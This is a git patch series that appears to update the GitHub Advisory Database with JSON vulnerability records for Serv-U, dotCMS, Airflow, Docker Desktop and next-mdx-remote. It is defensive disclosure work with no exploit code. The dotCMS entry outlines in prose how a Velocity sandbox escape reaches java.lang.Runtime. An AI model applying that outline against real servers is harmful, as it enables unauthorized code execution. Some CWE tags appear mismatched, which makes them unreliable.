@@ "type": "WEB", "url": "https://github.com/sunkaifei/FlyCms/issues/16" }, + { + "type": "WEB", + "url": "https://github.com/sunkaifei/FlyCms" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.338423" diff --git a/advisories/unreviewed/2025/12/GHSA-w2jm-qqhw-c9px/GHSA-w2jm-qqhw-c9px.json b/advisories/unreviewed/2025/12/GHSA-w2jm-qqhw-c9px/GHSA-w2jm-qqhw-c9px.json index 540b015719140..a2ac287b3f6d2 100644 --- a/advisories/unreviewed/2025/12/GHSA-w2jm-qqhw-c9px/GHSA-w2jm-qqhw-c9px.json +++ b/advisories/unreviewed/2025/12/GHSA-w2jm-qqhw-c9px/GHSA-w2jm-qqhw-c9px.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-w2jm-qqhw-c9px", - "modified": "2025-12-27T21:30:12Z", + "modified": "2026-02-24T09:31:18Z", "published": "2025-12-27T21:30:12Z", "aliases": [ "CVE-2025-15110" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15110" }, + { + "type": "WEB", + "url": "https://gitee.com/jackq/XCMS" + }, { "type": "WEB", "url": "https://gitee.com/jackq/XCMS/issues/IDC5C8" diff --git a/advisories/unreviewed/2025/12/GHSA-w944-w7q2-5fv6/GHSA-w944-w7q2-5fv6.json b/advisories/unreviewed/2025/12/GHSA-w944-w7q2-5fv6/GHSA-w944-w7q2-5fv6.json index 70a013740616f..5b46dbe5ad5b9 100644 --- a/advisories/unreviewed/2025/12/GHSA-w944-w7q2-5fv6/GHSA-w944-w7q2-5fv6.json +++ b/advisories/unreviewed/2025/12/GHSA-w944-w7q2-5fv6/GHSA-w944-w7q2-5fv6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-w944-w7q2-5fv6", - "modified": "2025-12-30T12:30:29Z", + "modified": "2026-02-24T09:31:20Z", "published": "2025-12-30T12:30:29Z", "aliases": [ "CVE-2025-15246" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15246" }, + { + "type": "WEB", + "url": "https://gitee.com/aizuda/snail-job" + }, { "type": "WEB", "url": "https://gitee.com/aizuda/snail-job/issues/ICQV61" diff --git a/advisories/unreviewed/2025/12/GHSA-xh4m-g9pq-wh25/GHSA-xh4m-g9pq-wh25.json b/advisories/unreviewed/2025/12/GHSA-xh4m-g9pq-wh25/GHSA-xh4m-g9pq-wh25.json index aa1c013b5318a..9a0cd4023112f 100644 --- a/advisories/unreviewed/2025/12/GHSA-xh4m-g9pq-wh25/GHSA-xh4m-g9pq-wh25.json +++ b/advisories/unreviewed/2025/12/GHSA-xh4m-g9pq-wh25/GHSA-xh4m-g9pq-wh25.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xh4m-g9pq-wh25", - "modified": "2025-12-30T12:30:29Z", + "modified": "2026-02-24T09:31:20Z", "published": "2025-12-30T12:30:29Z", "aliases": [ "CVE-2025-15247" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15247" }, + { + "type": "WEB", + "url": "https://gitee.com/gmg137/snap7-rs" + }, { "type": "WEB", "url": "https://gitee.com/gmg137/snap7-rs/issues/ID2H7V" diff --git a/advisories/unreviewed/2026/02/GHSA-8cmg-xf32-xmvr/GHSA-8cmg-xf32-xmvr.json b/advisories/unreviewed/2026/02/GHSA-8cmg-xf32-xmvr/GHSA-8cmg-xf32-xmvr.json new file mode 100644 index 0000000000000..1969863c8c520 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8cmg-xf32-xmvr/GHSA-8cmg-xf32-xmvr.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8cmg-xf32-xmvr", + "modified": "2026-02-24T09:31:21Z", + "published": "2026-02-24T09:31:21Z", + "aliases": [ + "CVE-2025-40540" + ], + "details": "A type confusion vulnerability exists in Serv-U which when exploited, gives a malicious actor the ability to execute arbitrary native code as privileged account.\n\nThis issue requires administrative privileges to abuse. On Windows deployments, the risk is scored as a medium because services frequently run under less-privileged service accounts by default.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-40540" + }, + { + "type": "WEB", + "url": "https://documentation.solarwinds.com/en/success_center/servu/content/release_notes/servu_15-5-4_release_notes.htm" + }, + { + "type": "WEB", + "url": "https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40540" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-704" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T08:16:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hwvv-m8xc-26x2/GHSA-hwvv-m8xc-26x2.json b/advisories/unreviewed/2026/02/GHSA-hwvv-m8xc-26x2/GHSA-hwvv-m8xc-26x2.json new file mode 100644 index 0000000000000..a1e8811711eea --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hwvv-m8xc-26x2/GHSA-hwvv-m8xc-26x2.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hwvv-m8xc-26x2", + "modified": "2026-02-24T09:31:21Z", + "published": "2026-02-24T09:31:21Z", + "aliases": [ + "CVE-2025-11165" + ], + "details": "A sandbox escape vulnerability exists in dotCMS’s Velocity scripting engine (VTools) that allows authenticated users with scripting privileges to bypass class and package restrictions enforced by SecureUberspectorImpl.\n\nBy dynamically modifying the Velocity engine’s runtime configuration and reinitializing its Uberspect, a malicious actor can remove the introspector.restrict.classes and introspector.restrict.packages protections.\n\nOnce these restrictions are cleared, the attacker can access arbitrary Java classes, including java.lang.Runtime, and execute arbitrary system commands under the privileges of the application process (e.g. dotCMS or Tomcat user).", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11165" + }, + { + "type": "WEB", + "url": "https://dev.dotcms.com/docs/known-security-issues?issueNumber=SI-74" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T09:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jjx5-vcwr-cwfq/GHSA-jjx5-vcwr-cwfq.json b/advisories/unreviewed/2026/02/GHSA-jjx5-vcwr-cwfq/GHSA-jjx5-vcwr-cwfq.json new file mode 100644 index 0000000000000..04acc1226a8c8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jjx5-vcwr-cwfq/GHSA-jjx5-vcwr-cwfq.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jjx5-vcwr-cwfq", + "modified": "2026-02-24T09:31:21Z", + "published": "2026-02-24T09:31:21Z", + "aliases": [ + "CVE-2025-40539" + ], + "details": "A type confusion vulnerability exists in Serv-U which when exploited, gives a malicious actor the ability to execute arbitrary native code as privileged account.\n\nThis issue requires administrative privileges to abuse. On Windows deployments, the risk is scored as a medium because services frequently run under less-privileged service accounts by default.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-40539" + }, + { + "type": "WEB", + "url": "https://documentation.solarwinds.com/en/success_center/servu/content/release_notes/servu_15-5-4_release_notes.htm" + }, + { + "type": "WEB", + "url": "https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40539" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-704" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T08:16:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p4xj-mrqw-g3f3/GHSA-p4xj-mrqw-g3f3.json b/advisories/unreviewed/2026/02/GHSA-p4xj-mrqw-g3f3/GHSA-p4xj-mrqw-g3f3.json new file mode 100644 index 0000000000000..83d2972e18856 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p4xj-mrqw-g3f3/GHSA-p4xj-mrqw-g3f3.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p4xj-mrqw-g3f3", + "modified": "2026-02-24T09:31:21Z", + "published": "2026-02-24T09:31:21Z", + "aliases": [ + "CVE-2024-1524" + ], + "details": "When the \"Silent Just-In-Time Provisioning\" feature is enabled for a federated identity provider (IDP) there is a risk that a local user store user's information may be replaced during the account provisioning process in cases where federated users share the same username as local users. \n\n There will be no impact on your deployment if any of the preconditions mentioned below are not met. Only when all the preconditions mentioned below are fulfilled could a malicious actor associate a targeted local user account with a federated IDP user account that they control.\n\nThe Deployment should have: \n-An IDP configured for federated authentication with Silent JIT provisioning enabled.\n\nThe malicious actor should have:\n-A fresh valid user account in the federated IDP that has not been used earlier.\n-Knowledge of the username of a valid user in the local IDP. \n-An account at the federated IDP matching the targeted local username.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1524" + }, + { + "type": "WEB", + "url": "https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2024-3144" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-290" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T09:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vh45-gfxf-vr42/GHSA-vh45-gfxf-vr42.json b/advisories/unreviewed/2026/02/GHSA-vh45-gfxf-vr42/GHSA-vh45-gfxf-vr42.json new file mode 100644 index 0000000000000..5feb42b2b4594 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vh45-gfxf-vr42/GHSA-vh45-gfxf-vr42.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vh45-gfxf-vr42", + "modified": "2026-02-24T09:31:21Z", + "published": "2026-02-24T09:31:21Z", + "aliases": [ + "CVE-2025-40541" + ], + "details": "An Insecure Direct Object Reference (IDOR) vulnerability exists in Serv-U, which when exploited, gives a malicious actor the ability to execute native code as a privileged account.\n\nThis issue requires administrative privileges to abuse. On Windows deployments, the risk is scored as a medium because services frequently run under less-privileged service accounts by default.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-40541" + }, + { + "type": "WEB", + "url": "https://documentation.solarwinds.com/en/success_center/servu/content/release_notes/servu_15-5-4_release_notes.htm" + }, + { + "type": "WEB", + "url": "https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40541" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-704" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T08:16:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x366-cwf7-x9gv/GHSA-x366-cwf7-x9gv.json b/advisories/unreviewed/2026/02/GHSA-x366-cwf7-x9gv/GHSA-x366-cwf7-x9gv.json new file mode 100644 index 0000000000000..60e9858d7603b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x366-cwf7-x9gv/GHSA-x366-cwf7-x9gv.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x366-cwf7-x9gv", + "modified": "2026-02-24T09:31:21Z", + "published": "2026-02-24T09:31:21Z", + "aliases": [ + "CVE-2025-40538" + ], + "details": "A broken access control vulnerability exists in Serv-U which when exploited, gives a malicious actor the ability to create a system admin user and execute arbitrary code as a privileged account via domain admin or group admin privileges.\n\nThis issue requires administrative privileges to abuse. On Windows deployments, the risk is scored as a medium because services frequently run under less-privileged service accounts by default.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-40538" + }, + { + "type": "WEB", + "url": "https://documentation.solarwinds.com/en/success_center/servu/content/release_notes/servu_15-5-4_release_notes.htm" + }, + { + "type": "WEB", + "url": "https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40538" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T08:16:27Z" + } +} \ No newline at end of file From 5e588eb9d55532e3abeb8f2f43c8a72239ac3792 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Tue, 24 Feb 2026 12:32:59 +0000 Subject: [PATCH 76/77] Publish Advisories GHSA-hm8v-8c3v-cxfq GHSA-8r55-rv5w-6pfm GHSA-q4hc-vp2m-fr47 GHSA-r837-hpv7-pc2f GHSA-x7c5-fjpp-2mcc --- .../GHSA-hm8v-8c3v-cxfq.json | 6 ++- .../GHSA-8r55-rv5w-6pfm.json | 35 +++++++++++++++++ .../GHSA-q4hc-vp2m-fr47.json | 6 ++- .../GHSA-r837-hpv7-pc2f.json | 39 +++++++++++++++++++ .../GHSA-x7c5-fjpp-2mcc.json | 36 +++++++++++++++++ 5 files changed, 120 insertions(+), 2 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-8r55-rv5w-6pfm/GHSA-8r55-rv5w-6pfm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r837-hpv7-pc2f/GHSA-r837-hpv7-pc2f.json create mode 100644 advisories/unreviewed/2026/02/GHSA-x7c5-fjpp-2mcc/GHSA-x7c5-fjpp-2mcc.json diff --git a/advisories/unreviewed/2025/10/GHSA-hm8v-8c3v-cxfq/GHSA-hm8v-8c3v-cxfq.json b/advisories/unreviewed/2025/10/GHSA-hm8v-8c3v-cxfq/GHSA-hm8v-8c3v-cxfq.json index 52b84781bac69..07d9cc442ebd2 100644 --- a/advisories/unreviewed/2025/10/GHSA-hm8v-8c3v-cxfq/GHSA-hm8v-8c3v-cxfq.json +++ b/advisories/unreviewed/2025/10/GHSA-hm8v-8c3v-cxfq/GHSA-hm8v-8c3v-cxfq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hm8v-8c3v-cxfq", - "modified": "2026-02-23T15:31:14Z", + "modified": "2026-02-24T12:31:40Z", "published": "2025-10-03T12:33:14Z", "aliases": [ "CVE-2025-11234" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:3077" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:3165" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2025-11234" diff --git a/advisories/unreviewed/2026/02/GHSA-8r55-rv5w-6pfm/GHSA-8r55-rv5w-6pfm.json b/advisories/unreviewed/2026/02/GHSA-8r55-rv5w-6pfm/GHSA-8r55-rv5w-6pfm.json new file mode 100644 index 0000000000000..8207e5a29e5db --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8r55-rv5w-6pfm/GHSA-8r55-rv5w-6pfm.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8r55-rv5w-6pfm", + "modified": "2026-02-24T12:31:40Z", + "published": "2026-02-24T12:31:40Z", + "aliases": [ + "CVE-2025-27555" + ], + "details": "Airflow versions before 2.11.1 have a vulnerability that allows authenticated users with audit log access to see sensitive values in audit logs which they should not see. When sensitive connection parameters were set via airflow CLI, values of those variables appeared in the audit log and were stored unencrypted in the Airflow database. While this risk is limited to users with audit log access, it is recommended to upgrade to Airflow 2.11.1 or a later version, which addresses this issue. Users who previously used the CLI to set connections should manually delete entries with those connection sensitive values from the log table. This is similar but not the same issue as CVE-2024-50378", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27555" + }, + { + "type": "WEB", + "url": "https://github.com/apache/airflow/pull/61882" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/nxovkp319jo8vg498gql1yswtb2frbkw" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-201" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T10:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q4hc-vp2m-fr47/GHSA-q4hc-vp2m-fr47.json b/advisories/unreviewed/2026/02/GHSA-q4hc-vp2m-fr47/GHSA-q4hc-vp2m-fr47.json index 63bddd81d06bb..d068af546c15a 100644 --- a/advisories/unreviewed/2026/02/GHSA-q4hc-vp2m-fr47/GHSA-q4hc-vp2m-fr47.json +++ b/advisories/unreviewed/2026/02/GHSA-q4hc-vp2m-fr47/GHSA-q4hc-vp2m-fr47.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-q4hc-vp2m-fr47", - "modified": "2026-02-23T18:32:02Z", + "modified": "2026-02-24T12:31:40Z", "published": "2026-02-23T18:32:02Z", "aliases": [ "CVE-2025-14905" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14905" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:3189" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2025-14905" diff --git a/advisories/unreviewed/2026/02/GHSA-r837-hpv7-pc2f/GHSA-r837-hpv7-pc2f.json b/advisories/unreviewed/2026/02/GHSA-r837-hpv7-pc2f/GHSA-r837-hpv7-pc2f.json new file mode 100644 index 0000000000000..cbec64bcdc3de --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r837-hpv7-pc2f/GHSA-r837-hpv7-pc2f.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r837-hpv7-pc2f", + "modified": "2026-02-24T12:31:40Z", + "published": "2026-02-24T12:31:40Z", + "aliases": [ + "CVE-2024-56373" + ], + "details": "DAG Author (who already has quite a lot of permissions) could manipulate database of Airflow 2 in the way to execute arbitrary code in the web-server context, which they should normally not be able to do, leading to potentially remote code execution in the context of web-server (server-side) as a result of a user viewing historical task information.\n\nThe functionality responsible for that (log template history) has been disabled by default in 2.11.1 and users should upgrade to Airflow 3 if they want to continue to use log template history. They can also manually modify historical log file names if they want to see historical logs that were generated before the last log template change.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-56373" + }, + { + "type": "WEB", + "url": "https://github.com/apache/airflow/pull/61880" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/2vrmrhcht6g7cp5yjxpnrk2wtrncm6cy" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2026/02/23/3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T10:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x7c5-fjpp-2mcc/GHSA-x7c5-fjpp-2mcc.json b/advisories/unreviewed/2026/02/GHSA-x7c5-fjpp-2mcc/GHSA-x7c5-fjpp-2mcc.json new file mode 100644 index 0000000000000..b5dc6645071a3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x7c5-fjpp-2mcc/GHSA-x7c5-fjpp-2mcc.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x7c5-fjpp-2mcc", + "modified": "2026-02-24T12:31:40Z", + "published": "2026-02-24T12:31:40Z", + "aliases": [ + "CVE-2026-2664" + ], + "details": "An out of bounds read vulnerability in the grpcfuse kernel module present in the Linux VM in Docker Desktop for Windows, Linux and macOS up to version 4.61.0 could allow a local attacker to cause an unspecified impact by writing to /proc/docker entries. The issue has been fixed in Docker Desktop 4.62.0 .", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2664" + }, + { + "type": "WEB", + "url": "https://docs.docker.com/desktop/release-notes/#4620" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T10:16:03Z" + } +} \ No newline at end of file From 8be3abb80dc1273c6a33ffe27f20bf86c8867e3d Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Tue, 24 Feb 2026 14:22:32 +0000 Subject: [PATCH 77/77] Publish Advisories GHSA-g4xw-jxrg-5f6m GHSA-g4xw-jxrg-5f6m --- .../GHSA-g4xw-jxrg-5f6m.json | 69 +++++++++++++++++++ .../GHSA-g4xw-jxrg-5f6m.json | 36 ---------- 2 files changed, 69 insertions(+), 36 deletions(-) create mode 100644 advisories/github-reviewed/2026/02/GHSA-g4xw-jxrg-5f6m/GHSA-g4xw-jxrg-5f6m.json delete mode 100644 advisories/unreviewed/2026/02/GHSA-g4xw-jxrg-5f6m/GHSA-g4xw-jxrg-5f6m.json diff --git a/advisories/github-reviewed/2026/02/GHSA-g4xw-jxrg-5f6m/GHSA-g4xw-jxrg-5f6m.json b/advisories/github-reviewed/2026/02/GHSA-g4xw-jxrg-5f6m/GHSA-g4xw-jxrg-5f6m.json new file mode 100644 index 0000000000000..63961d5d55767 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-g4xw-jxrg-5f6m/GHSA-g4xw-jxrg-5f6m.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g4xw-jxrg-5f6m", + "modified": "2026-02-24T14:20:56Z", + "published": "2026-02-12T03:31:01Z", + "aliases": [ + "CVE-2026-0969" + ], + "summary": "next-mdx-remote affected by arbitrary code execution in React server-side rendering of untrusted MDX content", + "details": "The serialize function used to compile MDX in next-mdx-remote is vulnerable to arbitrary code execution due to insufficient sanitization of MDX content.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "next-mdx-remote" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3.0" + }, + { + "fixed": "6.0.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0969" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/next-mdx-remote/commit/4d527fdcaed911b87f427d0b4d3c711e817fa4b3" + }, + { + "type": "WEB", + "url": "https://discuss.hashicorp.com/t/hcsec-2026-01-arbitrary-code-execution-in-react-server-side-rendering-of-untrusted-mdx-content/77155" + }, + { + "type": "PACKAGE", + "url": "https://github.com/hashicorp/next-mdx-remote" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/next-mdx-remote/releases/tag/v6.0.0" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-24T14:20:55Z", + "nvd_published_at": "2026-02-12T03:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-g4xw-jxrg-5f6m/GHSA-g4xw-jxrg-5f6m.json b/advisories/unreviewed/2026/02/GHSA-g4xw-jxrg-5f6m/GHSA-g4xw-jxrg-5f6m.json deleted file mode 100644 index 157325be9b0a5..0000000000000 --- a/advisories/unreviewed/2026/02/GHSA-g4xw-jxrg-5f6m/GHSA-g4xw-jxrg-5f6m.json +++ /dev/null @@ -1,36 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-g4xw-jxrg-5f6m", - "modified": "2026-02-12T03:31:01Z", - "published": "2026-02-12T03:31:01Z", - "aliases": [ - "CVE-2026-0969" - ], - "details": "The serialize function used to compile MDX in next-mdx-remote is vulnerable to arbitrary code execution due to insufficient sanitization of MDX content.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" - } - ], - "affected": [], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0969" - }, - { - "type": "WEB", - "url": "https://discuss.hashicorp.com/t/hcsec-2026-01-arbitrary-code-execution-in-react-server-side-rendering-of-untrusted-mdx-content/77155" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-94" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2026-02-12T03:15:46Z" - } -} \ No newline at end of file